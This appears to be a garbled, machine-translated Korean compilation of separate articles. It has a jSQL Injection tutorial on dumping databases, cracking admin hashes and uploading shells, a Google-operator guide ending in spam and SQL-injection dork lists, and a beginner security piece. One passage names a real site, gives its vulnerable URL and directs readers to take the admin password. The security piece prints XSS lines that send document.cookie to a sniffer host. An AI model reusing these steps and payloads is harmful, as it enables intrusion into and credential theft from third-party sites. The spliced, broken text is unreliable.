Kali Linux에서 SQL 주입을 검색하고 활용하기 위한 다기능 도구인 jSQL 주입 사용 지침입니다. JSQL 주입 사용 지침 - Kali Linux에서 SQL 주입을 검색하고 활용하기 위한 다기능 도구

다운로드한 파일을 더블클릭하여 실행하세요. 가상 머신 ).

[개발중인 구간]

[개발중인 구간]

[개발중인 구간]

프로그램 작업은 매우 간단합니다. 웹사이트 주소를 입력하고 ENTER를 누르세요.

다음 스크린샷은 해당 사이트가 동시에 세 가지 유형의 SQL 주입에 취약함을 보여줍니다(이들에 대한 정보는 오른쪽 하단에 표시됨). 주사 이름을 클릭하면 사용 방법을 전환할 수 있습니다.

또한 기존 데이터베이스가 이미 표시되었습니다.

각 테이블의 내용을 볼 수 있습니다.

일반적으로 테이블에서 가장 흥미로운 점은 관리자 자격 증명입니다.

운이 좋아서 관리자의 데이터를 찾았다면 아직 기뻐하기에는 너무 이릅니다. 이 데이터를 입력할 수 있는 관리 패널을 찾아야 합니다.

이렇게 하려면 다음 탭으로 이동하세요. 여기에 가능한 주소 목록이 표시됩니다. 확인할 페이지를 하나 이상 선택할 수 있습니다.

다른 프로그램을 사용할 필요가 없다는 점이 편리합니다.

불행하게도 비밀번호를 일반 텍스트로 저장하는 부주의한 프로그래머는 그리 많지 않습니다. 비밀번호 입력란에 다음과 같은 내용이 자주 표시됩니다.

8743b52063cd84097a65d1633f5c74f5

이것은 해시입니다. 무차별 대입을 사용하여 암호를 해독할 수 있습니다. 그리고... jSQL 주입에는 무차별 대입 도구가 내장되어 있습니다.

의심할 여지 없는 편리함은 다른 프로그램을 찾을 필요가 없다는 것입니다. 가장 널리 사용되는 해시가 많이 지원됩니다.

이게 제일 아니지 최선의 선택. 해시 디코딩 전문가가 되려면 러시아어로 된 ""책을 권장합니다.

하지만 물론, 다른 프로그램이 없거나 공부할 시간이 없을 때는 무차별 대입 기능이 내장된 jSQL 주입이 매우 유용할 것입니다.

설정이 있습니다. 비밀번호에 포함되는 문자, 비밀번호 길이 범위를 설정할 수 있습니다.

데이터베이스 작업(읽기 및 수정) 외에도 SQL 주입이 감지되면 다음 파일 작업을 수행할 수 있습니다.

• 서버에서 파일 읽기
• 서버에 새 파일 업로드
• 서버에 쉘 업로드

그리고 이 모든 것이 jSQL 주입으로 구현됩니다!

제한 사항이 있습니다. SQL Server에는 파일 권한이 있어야 합니다. 센스있는 분들 시스템 관리자그들은 장애인이고 다음에 접근할 수 있습니다. 파일 시스템얻을 수 없을 것입니다.

파일 권한이 있는지 확인하는 것은 매우 간단합니다. 탭(파일 읽기, 셸 생성, 새 파일 업로드) 중 하나로 이동하여 지정된 작업 중 하나를 수행해 보세요.

아직도 매우 중요한 메모- 작업할 파일의 정확한 절대 경로를 알아야 합니다. 그렇지 않으면 아무것도 작동하지 않습니다.

다음 스크린샷을 보세요.

파일에 대한 작업을 시도하면 다음과 같은 응답을 받습니다. FILE 권한 없음(파일 권한 없음). 그리고 여기서는 아무것도 할 수 없습니다.

대신 다른 오류가 발생하는 경우:

[directory_name]에 쓰는 동안 문제가 발생했습니다.

이는 파일을 쓰려는 절대 경로를 잘못 지정했음을 의미합니다.

절대 경로를 추측하려면 최소한 알아야 합니다. 운영 체제서버가 실행되고 있는 곳입니다. 이렇게 하려면 네트워크 탭으로 전환하세요.

이 항목(Win64 라인)은 우리가 Windows OS를 다루고 있다고 가정할 이유를 제공합니다.

Keep-Alive: timeout=5, max=99 서버: Apache/2.4.17 (Win64) PHP/7.0.0RC6 연결: Keep-Alive 방법: HTTP/1.1 200 OK 콘텐츠 길이: 353 날짜: 2015년 12월 11일 금요일 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 콘텐츠 유형: text/html; 문자셋=UTF-8

여기에 몇 가지 Unix(*BSD, Linux)가 있습니다.

전송 인코딩: 청크 날짜: 2015년 12월 11일 금요일 11:57:02 GMT 방법: HTTP/1.1 200 OK 연결 유지: 시간 초과=3, 최대=100 연결: 연결 유지 콘텐츠 유형: text/html X- 제공: PHP/5.3.29 서버: Apache/2.2.31(Unix)

여기에 CentOS가 있습니다.

방법: HTTP/1.1 200 OK 만료: 1981년 11월 19일 목요일 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ 연결: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru:6666 t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache 날짜: 2015년 12월 11일 금요일 12:08:54 GMT 전송 인코딩: 청크 콘텐츠 유형: text/html; 문자셋=WINDOWS-1251

Windows에서 사이트의 일반적인 폴더는 C:\Server\data\htdocs\ 입니다. 그러나 실제로 누군가가 Windows에서 서버를 만드는 것을 "생각"했다면 이 사람은 권한에 대해 전혀 들어본 적이 없을 가능성이 높습니다. 따라서 C:/Windows/ 디렉터리에서 직접 시도를 시작해야 합니다.

보시다시피 처음에는 모든 것이 잘 진행되었습니다.

그러나 jSQL 주입 쉘 자체는 내 마음 속에 의심을 불러일으킵니다. 파일 권한이 있으면 웹 인터페이스를 사용하여 쉽게 업로드할 수 있습니다.

그리고 이 기능도 jSQL 주입에서 사용할 수 있습니다. 모든 것이 매우 간단합니다. 사이트 목록을 다운로드하고(파일에서 가져올 수 있음) 확인하려는 사이트를 선택한 다음 해당 버튼을 클릭하여 작업을 시작합니다.

jSQL 인젝션이 좋은데, 강력한 도구웹사이트에서 발견된 SQL 인젝션을 검색하고 이후에 사용합니다. 의심할 여지 없는 장점: 사용 용이성, 내장형 관련 기능. 웹사이트를 분석할 때 jQuery 주입은 초보자에게 가장 좋은 친구가 될 수 있습니다.

단점 중에는 데이터베이스 편집이 불가능하다는 점에 주목하고 싶습니다(적어도 이 기능은 찾지 못했습니다). 모든 악기가 그렇듯 그래픽 인터페이스, 이 프로그램의 단점 중 하나는 스크립트에서 사용할 수 없다는 점입니다. 그럼에도 불구하고, 내장된 대량 사이트 확인 기능 덕분에 이 프로그램에서는 일부 자동화도 가능합니다.

jSQL 주입 프로그램은 sqlmap보다 사용하기가 훨씬 편리합니다. 그러나 sqlmap은 더 많은 유형의 SQL 삽입을 지원하고 파일 방화벽 및 기타 기능 작업을 위한 옵션을 제공합니다.

요점: jSQL 주입 - 가장 친한 친구초보 해커.

Kali Linux 백과사전의 이 프로그램에 대한 도움말은 다음 페이지에서 찾을 수 있습니다: http://kali.tools/?p=706

아마 다들 이 사용법을 알고 계실 거에요 검색 엔진, Google과 같습니다 =) 그러나 올바르게 구성하면 모든 사람이 그것을 아는 것은 아닙니다. 검색어특별한 디자인의 도움으로 훨씬 더 효율적이고 빠르게 원하는 결과를 얻을 수 있습니다 =) 이 기사에서는 올바른 검색을 위해 무엇을 어떻게 해야 하는지 보여 드리겠습니다.

Google은 google.com에서 검색할 때 특별한 의미를 갖는 여러 가지 고급 검색 연산자를 지원합니다. 일반적으로 이러한 연산자는 검색 내용을 변경하거나 Google에 검색 내용을 완전히 변경하도록 지시합니다. 다양한 유형찾다. 예를 들어, link: 구성은 특수 연산자이고 요청은 링크:www.google.com일반 검색을 제공하지 않고 대신 google.com에 대한 링크가 있는 모든 웹페이지를 찾습니다.
대체 요청 유형

캐시: 검색어에 다른 단어를 포함하면 Google은 캐시된 문서 내에 포함된 단어를 강조표시합니다.
예를 들어, 캐시:www.website"웹"이라는 단어가 강조 표시된 캐시된 콘텐츠를 표시합니다.

링크: 위의 검색어는 지정된 검색어에 대한 링크가 포함된 웹페이지를 표시합니다.
예를 들어: 링크:www.site http://www.site에 대한 링크가 있는 모든 페이지가 표시됩니다.

관련: 지정된 웹 페이지와 "관련"된 웹 페이지를 표시합니다.
예를 들어, 관련: www.google.com유사한 웹페이지가 나열됩니다. 홈페이지 Google.

info: 요청 정보: 귀하가 요청하는 웹페이지에 대해 Google이 가지고 있는 정보 중 일부를 표시합니다.
예를 들어, 정보:웹사이트우리 포럼에 대한 정보를 보여줄 것입니다 =) (Armada - 성인 웹마스터 포럼).

기타 정보 요청

정의: 정의: 쿼리는 다양한 온라인 소스에서 수집된 쿼리 뒤에 입력하는 단어에 대한 정의를 제공합니다. 정의는 입력된 전체 구문에 대한 것입니다(즉, 정확한 쿼리의 모든 단어가 포함됩니다).

주식: 주식으로 검색을 시작하는 경우: Google은 나머지 검색어를 주식 기호로 처리하고 이러한 기호에 대해 미리 만들어진 정보를 표시하는 페이지로 링크합니다.
예를 들어, 주식:인텔 야후 Intel과 Yahoo에 대한 정보가 표시됩니다. (회사 이름이 아닌 속보 기호를 입력해야 합니다.)

쿼리 수정자

사이트: 검색어에 사이트:를 포함하면 Google은 해당 도메인에서 찾은 웹사이트로 결과를 제한합니다.
ru, org, com 등 개별 영역별로 검색할 수도 있습니다( 사이트:com 사이트:루)

allintitle: allintitle:을 사용하여 쿼리를 실행하면 Google은 제목에 있는 모든 쿼리 단어로 결과를 제한합니다.
예를 들어, 모든 제목: 구글 검색 이미지, 블로그 등 검색을 통해 모든 Google 페이지를 반환합니다.

intitle: 검색어에 intitle:을 포함하면 Google은 제목에 해당 단어가 포함된 문서로 결과를 제한합니다.
예를 들어, 제목:비즈니스

allinurl: allinurl:을 사용하여 쿼리를 실행하면 Google은 결과를 URL의 모든 쿼리 단어로 제한합니다.
예를 들어, allinurl: 구글 검색 Google로 문서를 반환하고 제목으로 검색합니다. 또한 옵션으로 슬래시(/)로 단어를 구분할 수 있으며, 그러면 슬래시 양쪽에 있는 단어가 동일한 페이지 내에서 검색됩니다. allinurl: foo/bar

inurl: 검색어에 inurl:을 포함하면 Google은 URL에 해당 단어가 포함된 문서로 결과를 제한합니다.
예를 들어, 애니메이션 URL:사이트

intext: 제목과 링크 텍스트 및 관련되지 않은 다른 항목을 무시하고 페이지 텍스트에서 지정된 단어만 검색합니다. 이 수식어의 파생어인 allintext도 있습니다. 또한 쿼리의 모든 단어는 텍스트에서만 검색됩니다. 이는 링크에서 자주 사용되는 단어를 무시하고 중요할 수도 있습니다.
예를 들어, 텍스트:포럼

날짜 범위: 기간(날짜 범위:2452389-2452389) 내에서 검색합니다. 시간 날짜는 율리우스 형식입니다.

음, 그리고 모든 종류의 흥미로운 쿼리 예가 있습니다.

Google에 대한 쿼리 작성의 예. 스패머의 경우

Inurl:control.guest?a=sign

사이트:books.dreambook.com “홈페이지 URL” “내 서명” inurl:sign

사이트:www.freegb.net 홈페이지

Inurl:sign.asp “문자 수”

"메시지:" inurl:sign.cfm "보낸 사람:"

Inurl:register.php “사용자 등록” “웹사이트”

Inurl:edu/guestbook “방명록에 서명하세요”

Inurl:post “댓글 게시” “URL”

Inurl:/archives/ “댓글:” “정보를 기억하시나요?”

“스크립트 및 방명록 작성자:” “URL:” “댓글:”

Inurl:?action=“phpBook”“URL”추가

제목: "새 스토리 제출"

잡지

URL:www.livejournal.com/users/mode=reply

Inurl maximumjournal.com/ mode=reply

URL:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "방명록"

블로그

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ “댓글 달기” “개인 정보를 기억하시나요?”

Inurl:greatestjournal.com/community/ “댓글 게시” “익명의 게시자 주소”

"댓글 게시" "익명의 게시자 주소" -

제목:"댓글 게시"

Inurl:pirillo.com “댓글 게시”

포럼

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- 질문-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: Offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

여기에 작은 목록이 있습니다. 당신은 당신을 사용할 수 있습니다. 그래서 우리는 사이트를 찾았습니다. 예를 들어 http://www.vestitambov.ru/
다음으로 이 프로그램을 다운로드하세요.

확인을 클릭하세요. 그런 다음 피해 사이트를 삽입합니다.
시작을 누릅니다. 다음으로 결과를 기다립니다.
그래서 프로그램은 SQL 취약점을 발견했습니다.

다음으로 Havij를 다운로드하고 http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= 받은 링크를 거기에 붙여넣으세요. Havij 사용 방법과 다운로드 위치는 별도로 설명하지 않겠습니다. 모두. 필요한 데이터(관리자 비밀번호)를 받았는데, 그 다음은 여러분의 상상에 달려 있습니다.

추신 이것은 제가 처음으로 글을 쓰려는 시도입니다. 뭔가 문제가 있다면 죄송합니다

나는 그것에 대해 조금 이야기하기로 결정했습니다 정보 보안. 이 기사는 초보 프로그래머와 이제 막 프론트엔드 개발에 참여하기 시작한 사람들에게 유용할 것입니다. 무엇이 문제인가요?

많은 초보 개발자는 코드 작성에 너무 열중하여 작업 보안을 완전히 잊어버립니다. 그리고 가장 중요한 것은 SQL 및 XXS 쿼리와 같은 취약점을 잊어버린다는 것입니다. 그들은 또한 관리 패널에 대한 쉬운 비밀번호를 제시하고 무차별 대입 공격을 받습니다. 이러한 공격은 무엇이며 어떻게 피할 수 있습니까?

SQL 주입은 특정 DBMS에 대한 SQL 쿼리 중에 수행되는 데이터베이스에 대한 가장 일반적인 공격 유형입니다. 많은 사람들과 심지어 대기업도 이러한 공격으로 고통받고 있습니다. 그 이유는 데이터베이스 및 엄밀히 말하면 SQL 쿼리를 작성할 때 개발자 오류 때문입니다.

SQL 쿼리에 사용된 입력 데이터의 잘못된 처리로 인해 SQL 주입 공격이 가능합니다. 해커의 공격이 성공하면 데이터베이스 내용뿐만 아니라 비밀번호 및 관리 패널 로그도 손실될 위험이 있습니다. 그리고 이 데이터는 사이트를 완전히 장악하거나 되돌릴 수 없는 조정을 하기에 충분합니다.

공격은 PHP, ASP, Perl 및 기타 언어로 작성된 스크립트에서 성공적으로 재현될 수 있습니다. 이러한 공격의 성공 여부는 어떤 DBMS가 사용되는지, 스크립트 자체가 어떻게 구현되는지에 따라 달라집니다. 전 세계에는 SQL 인젝션에 취약한 사이트가 많이 있습니다. 이는 확인하기 쉽습니다. "dorks"만 입력하세요. 이는 취약한 사이트를 검색하기 위한 특수 쿼리입니다. 그 중 일부는 다음과 같습니다.

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:페이지ID=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

어떻게 사용하나요? Google 또는 Yandex 검색 엔진에 입력하기만 하면 됩니다. 검색 엔진은 취약한 사이트뿐만 아니라 이 취약성에 대한 페이지도 제공합니다. 하지만 우리는 거기서 멈추지 않고 페이지가 실제로 취약한지 확인합니다. 이렇게 하려면 "id=1" 값 뒤에 넣으면 충분합니다. 작은따옴표"'". 다음과 같은 것 :

• inurl:games.php?id=1'

그리고 사이트에서는 다음과 같은 오류를 표시합니다. SQL 쿼리. 해커에게 다음으로 필요한 것은 무엇입니까?

그런 다음 그는 오류 페이지에 대한 바로 이 링크가 필요합니다. 그런 다음 대부분의 경우 취약점에 대한 작업은 삽입 코드를 도입하고 필요한 작업을 수행하는 이 부분에 대한 유틸리티를 사용하여 "Kali linux" 배포판에서 수행됩니다. 어떻게 이런 일이 일어날지는 말씀드릴 수 없습니다. 그러나 이에 대한 정보는 인터넷에서 찾을 수 있습니다.

이러한 유형의 공격은 다음에 대해 수행됩니다. 쿠키. 사용자는 이를 저장하는 것을 좋아합니다. 왜 안 돼? 그들 없이 우리는 무엇을 할 것인가? 결국 쿠키 덕분에 Vk.com이나 Mail.ru의 비밀번호를 백 번 입력할 필요가 없습니다. 그리고 그것을 거부하는 사람은 거의 없습니다. 그러나 인터넷에서는 해커에게 규칙이 자주 나타납니다. 편의성 계수는 ​​불안 계수에 정비례합니다.

XSS 공격을 구현하려면 해커가 JavaScript에 대한 지식이 필요합니다. 언뜻 보기에 이 언어는 컴퓨터 리소스에 접근할 수 없기 때문에 매우 단순하고 무해합니다. 해커는 브라우저에서 JavaScript로만 작업할 수 있지만 그것으로 충분합니다. 결국 가장 중요한 것은 웹페이지에 코드를 입력하는 것입니다.

공격 과정에 대해서는 자세히 이야기하지 않겠습니다. 어떻게 이런 일이 일어나는지에 대한 기본과 의미만 말씀드리겠습니다.

해커는 일부 포럼이나 방명록에 JS 코드를 추가할 수 있습니다.

document.location.href =”http://192.168.1.7/sniff.php?test”

스크립트는 코드가 실행될 감염된 페이지로 우리를 리디렉션합니다. 스니퍼, 일종의 저장소 또는 어떻게든 캐시에서 쿠키를 훔치는 익스플로잇 등이 있습니다.

왜 자바스크립트인가? JavaScript는 웹 요청을 처리하는 데 능숙하고 쿠키에 액세스할 수 있기 때문입니다. 그러나 스크립트를 통해 어떤 사이트로 이동하면 사용자는 이를 쉽게 알아차릴 것입니다. 여기서 해커는 더 교활한 옵션을 사용합니다. 그는 단순히 그림에 코드를 입력합니다.

Img=새 이미지();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

간단히 이미지를 생성하고 스크립트에 주소를 할당하면 됩니다.

이 모든 것으로부터 자신을 보호하는 방법은 무엇입니까? 매우 간단합니다. 의심스러운 링크를 클릭하지 마세요.

DoS(영어 서비스 거부에서 유래) - 서비스 거부) - 해커 공격~에 컴퓨터 시스템그녀를 실패로 이끌기 위해. 이는 시스템의 선의의 사용자가 제공된 서비스에 액세스할 수 없는 조건을 만드는 것입니다. 시스템 리소스(서버) 또는 이 접근이 어렵습니다. 긴급 상황에서 소프트웨어가 중요한 정보(예: 버전, 부품)를 생성하는 경우 시스템 오류는 시스템 인수를 향한 단계일 수도 있습니다. 프로그램 코드기타 그러나 대부분 이것은 경제적 압박의 척도입니다. 즉, 소득을 창출하는 간단한 서비스의 손실입니다. 공급자의 청구서 또는 공격을 피하기 위한 조치는 주머니 속의 "표적"에 큰 타격을 입혔습니다. 현재 DoS 및 DDoS 공격은 법적으로 중요한 증거를 남기지 않고 거의 모든 시스템이 실패하도록 허용하기 때문에 가장 널리 사용됩니다.

DoS와 DDos 공격의 차이점은 무엇입니까?

DoS는 교묘하게 설계된 공격입니다. 예를 들어, 서버가 수신 패킷의 정확성을 확인하지 않으면 해커가 요청을 처리하는 데 시간이 오래 걸릴 수 있으며 다른 연결을 처리할 프로세서 시간이 충분하지 않게 됩니다. 이에 따라 고객 서비스가 거부됩니다. 그러나 이런 방식으로 잘 알려진 대규모 사이트를 과부하하거나 비활성화하는 것은 불가능합니다. 이러한 과부하에도 문제 없이 대처할 수 있는 상당히 넓은 채널과 초강력 서버로 무장하고 있습니다.

DDoS는 실제로 DoS와 동일한 공격입니다. 그러나 DoS에 하나의 요청 패킷이 있는 경우 DDoS에는 수백 개 이상이 있을 수 있습니다. 아무리 강력한 서버라도 이러한 과부하에 대처하지 못할 수도 있습니다. 예를 들어 보겠습니다.

DoS 공격은 누군가와 대화를 나누고 있는데 예의가 없는 사람이 다가와 큰 소리로 소리를 지르는 것을 말합니다. 말하기가 불가능하거나 매우 어렵습니다. 해결 방법: 보안요원에게 연락해 진정시키고 해당 사람을 현장에서 쫓아내십시오. DDoS 공격은 수천 명의 무례한 사람들이 몰려드는 것입니다. 이 경우 보안요원은 모든 사람을 묶어서 데려갈 수 없습니다.

DoS와 DDoS는 소위 좀비라고 불리는 컴퓨터에서 수행됩니다. 이들은 자신의 컴퓨터가 서버에 대한 공격에 참여하고 있다고 의심하지 않는 해커에 의해 해킹된 사용자의 컴퓨터입니다.

이것으로부터 자신을 보호하는 방법은 무엇입니까? 일반적으로 절대 그렇지 않습니다. 하지만 해커에게는 상황이 더 어려워질 수 있습니다. 이렇게 하려면 다음을 선택해야 합니다. 좋은 호스팅강력한 서버와 함께.

개발자는 다양한 공격 보호 시스템을 마련하고, 우리가 작성한 스크립트를 완전히 검토하고, 사이트에서 취약점을 확인하는 등의 작업을 할 수 있습니다. 그러나 그것에 관해서는 마지막 단계사이트 레이아웃, 즉 단순히 관리자 패널에 비밀번호를 입력하면 한 가지를 잊어버릴 수 있습니다. 비밀번호!

간단한 비밀번호를 설정하는 것은 엄격히 권장되지 않습니다. 12345, 1114457, vasya111 등이 될 수 있습니다. 길이가 10-11자 미만인 비밀번호를 설정하지 않는 것이 좋습니다. 그렇지 않으면 가장 일반적이고 복잡하지 않은 공격인 무차별 대입 공격을 받을 수 있습니다.

무차별 대입(Brute force)은 다음을 사용하는 사전 비밀번호 공격입니다. 특별 프로그램. 사전은 다를 수 있습니다. 라틴어, 숫자로 열거, 특정 범위까지 혼합(라틴어 + 숫자), 고유 문자가 포함된 사전도 있습니다 @#4$%&*~~`'”\ ? 등.

물론 이러한 유형의 공격은 복잡한 비밀번호만 생각해내면 쉽게 피할 수 있습니다. 보안 문자라도 당신을 구할 수 있습니다. 또한 귀하의 사이트가 CMS에서 만들어진 경우 많은 사이트에서 이러한 유형의 공격을 감지하고 IP를 차단합니다. 비밀번호에 문자가 많을수록 추측하기가 더 어렵다는 점을 항상 기억해야 합니다.

해커는 어떻게 작동하나요? 대부분의 경우 사전에 비밀번호의 일부를 의심하거나 알고 있습니다. 사용자의 비밀번호가 확실히 3~5자로 구성되지 않을 것이라고 가정하는 것은 매우 논리적입니다. 이러한 비밀번호는 빈번한 해킹으로 이어집니다. 기본적으로 해커는 5~10자 범위에서 미리 알 수 있는 여러 문자를 추가합니다. 다음으로 필요한 범위의 비밀번호가 생성됩니다. Kali Linux 배포판에는 이러한 경우를 위한 프로그램도 있습니다. 그리고 짜잔, 사전의 양이 더 이상 그렇게 크지 않기 때문에 공격은 더 이상 오래 지속되지 않습니다. 게다가 해커는 비디오 카드의 힘을 이용할 수도 있다. 그 중 일부는 CUDA 시스템을 지원해 검색 속도가 10배나 빨라진다. 이제 우리는 공격이 다음과 같다는 것을 알 수 있습니다 간단한 방법으로아주 진짜. 그러나 무차별 공격의 대상이 되는 것은 웹사이트만이 아닙니다.

친애하는 개발자 여러분, 정보 보안 시스템을 잊지 마세요. 오늘날 국가를 포함한 많은 사람들이 이러한 유형의 공격으로 고통 받고 있기 때문입니다. 결국, 가장 큰 취약성은 항상 어딘가에 주의가 산만해지거나 무언가를 놓칠 수 있는 사람입니다. 우리는 프로그래머이지만 프로그래밍된 기계는 아닙니다. 정보를 잃으면 심각한 결과를 초래할 수 있으므로 항상 경계하십시오!